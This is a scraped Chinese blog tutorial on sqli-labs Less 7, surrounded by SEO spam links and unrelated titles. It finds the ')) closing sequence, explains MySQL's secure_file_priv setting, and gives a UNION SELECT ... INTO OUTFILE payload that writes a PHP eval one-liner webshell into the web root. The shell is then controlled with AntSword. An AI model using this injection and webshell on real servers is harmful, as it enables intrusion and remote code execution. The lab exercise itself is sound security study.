当前位置: 首页 > wzjs >正文

免费做兼职的网站有吗博客 wordpress主题

免费做兼职的网站有吗,博客 wordpress主题,一个网站的设计周期,p2网站模板文章目录 sqli-labs靶场less 7 mysql文件上传拿web shell sqli-labs靶场 每道题都从以下模板讲解,并且每个步骤都有图片,清晰明了,便于复盘。 sql注入的基本步骤 注入点注入类型 字符型:判断闭合方式 (‘、"、…

文章目录

  • sqli-labs靶场
    • less 7 mysql文件上传拿web shell


sqli-labs靶场

每道题都从以下模板讲解,并且每个步骤都有图片,清晰明了,便于复盘。

sql注入的基本步骤

  • 注入点
  • 注入类型
    • 字符型:判断闭合方式 (‘、"、’'、“”)
    • 数字型
  • 根据实际情况,选择合适的注入方式
  • 获取数据库名,表名,列名,数据

less 7 mysql文件上传拿web shell

  • 题目类型: 字符型 ’ )) 闭合(无数据回显,无具体报错)

id=1

id=1'

id=1’
报错

在这里插入图片描述

id=1’’
回显正常页面
可以看到页面呈规律性变化,大概率单引号闭合

在这里插入图片描述

id=1’–+
–+ 注释后面的语句,检验闭合方式是否正确
报错,说明闭合式不完全是单引号,单引号后面应该跟着其他符号

在这里插入图片描述

尝试:在单引号后面加双引号或者单引号或者括号,不断尝试,直至正常回显
id=1’))–+
回显正常,说明’))是闭合符
在这里插入图片描述


这道题无回显,无具体报错信息(只有固定报错提示),并且根据正确语法页面提示,使用mysql文件上传

我们得先了解mysql文件上传拿web shell的知识

此题基本上实战无法完成,环境要求苛刻

mysql文件上传要点( 权限,完整上传路径 ):

  • show variables like’%secure%'; 用来查看mysql是否有读写文件权限;
    在这里插入图片描述

要点1.数据库的fle权限规定了数据库用户是否有权限,向操作系统内写入和读取已存在的权限;

secure_file_priv这个参数用来限制数据导入和导出操作的效果,例如执行LOAD DATA、SELECT … INTO OUTFILE语句和LOAD_FILE()函数。这些操作需要用户具有FILE权限。

secure_file_priv=null 不允许导入导出
secure_file_priv=具体文件路径 只允许从这个路径导入导出
secure_file_priv=‘ ’ 可以从任意路径导入导出

要点2. into outfile 命令使用的环境:必须知道一个,服务器上可以写入文件的文件夹的完整路径


文件上传指令

?id=-1’)) union select 1,“<?php @eval($ PosT['password']);?>”,3 into outfile “D:\\phpstudy_pro\www\\ben.php”–+

  • <?php @eval($_POST[password"]);?> //为一句话木马
    • password为预留密码
    • D:\\phpstudy_pro\WWW为文件路径
    • ben.php为新插入的文件名

开始做题
预处理mysql上传文件所需的环境

  • 找到mysql文件夹下的my.ini配置文件,如果有secure_file_priv,则修改,要不没有secure_file_priv,则自行添加
    在这里插入图片描述
  • 改成可以从任意路径导入导出 secure_file_priv=’ ’
    在这里插入图片描述
  • 记得重启数据库才生效
    在这里插入图片描述

环境处理好,咱们开始sql注入了

id=1'))  union select 1,2, " <?php @eval($_POST['123'] ); ?>"  into outfile 'C:\\SoftWare\\phpStudy_64\\phpstudy_pro\\WWW\\muma.php' --+

页面输入显示固定错误提示,但是已经成功上传木马文件
在这里插入图片描述
上传成功
在这里插入图片描述
内容如下,<?php @eval($_POST['123'] ); ?>这句话是关键,前面的数据不会影响解析

在这里插入图片描述
本人靶场是部署在虚拟机下
打开中国蚁剑,添加数据,连接
在这里插入图片描述

可以先测试连接
在这里插入图片描述

测试连接成功,再点击添加,可以看到成功拿下
在这里插入图片描述



文章转载自:

http://FKRLiNvC.dzrcj.cn
http://XRJsjOic.dzrcj.cn
http://FxzUC3tB.dzrcj.cn
http://AZVJ0h91.dzrcj.cn
http://Bljc9E6d.dzrcj.cn
http://VNRpsXoh.dzrcj.cn
http://zNEOq6O6.dzrcj.cn
http://MwbgNSOo.dzrcj.cn
http://1E6zYY3Y.dzrcj.cn
http://KjBuetWg.dzrcj.cn
http://590zQ8ux.dzrcj.cn
http://WE1vrLHH.dzrcj.cn
http://ta5vEzUM.dzrcj.cn
http://hPRNVyDt.dzrcj.cn
http://6vIrbG6h.dzrcj.cn
http://ANa173a5.dzrcj.cn
http://gNfaVsLa.dzrcj.cn
http://x4z4UzqD.dzrcj.cn
http://l28GKf1S.dzrcj.cn
http://xphxpJsr.dzrcj.cn
http://4PE9kSDS.dzrcj.cn
http://KgbjCCib.dzrcj.cn
http://xzSJqDNf.dzrcj.cn
http://xe72fmp2.dzrcj.cn
http://mxhbKe3H.dzrcj.cn
http://zf45vCjK.dzrcj.cn
http://YZge093T.dzrcj.cn
http://dCeMa6ik.dzrcj.cn
http://IqY32o60.dzrcj.cn
http://0KjLZk0b.dzrcj.cn
http://www.dtcms.com/wzjs/731803.html

相关文章:

  • 茶叶网站建设要求济南房产信息网官网
  • 怎么在凡科做自己网站网上做衣服的网站有哪些
  • 后台查看网站容量网站备案号显示红色
  • 台州市网站建设做网站简介
  • 中交建设招标有限公司网站济南标场馆建设有新进展
  • 做a动漫视频在线观看网站上海网站公司
  • 网页设计教程孟宪宁课后题答案seo网站优化专员
  • 现在学网站开发网站建设优化石家庄
  • 寿光专业做网站安卓上搭建wordpress
  • 电脑网站建设规划制作图片视频的软件有哪些
  • 仪器网站模版谁做违法网站
  • 网站关键字代码sns社交网站.net源码
  • php企业网站模板免费下载当今做那些网站能致富
  • 打电话叫人做网站wordpress 投稿 图片
  • dw怎么做购物网站网站推广一般在哪个网做
  • 电商网站seo优化目标分解用flash做的经典网站
  • iis2008如何做网站建设专业网站运营团队
  • 数据库网站建设多少钱wordpress模板转为emlog
  • 一个网站有几个域名路北网站制作
  • 你知道的在线视频观看的vue做网站如何优化seo
  • 企业网站建设的一般要素包括6建网站要大约多少钱
  • 用html5做的音乐网站wordpress背景图像
  • 哪个网站上做ppt比较好看网站建设更新
  • 网站中的ppt链接怎么做广元城乡建设部网站首页
  • 网站自适应 如何做杭州互联网大厂
  • 做网站英文编辑有前途吗余姚做网站
  • 查备案网站两学一做 答题 网站
  • 网站托管平台东莞营销型高端网站建设
  • 运营一个网站的成本友情链接搜读
  • 网站数据库建设access做电视的视频网站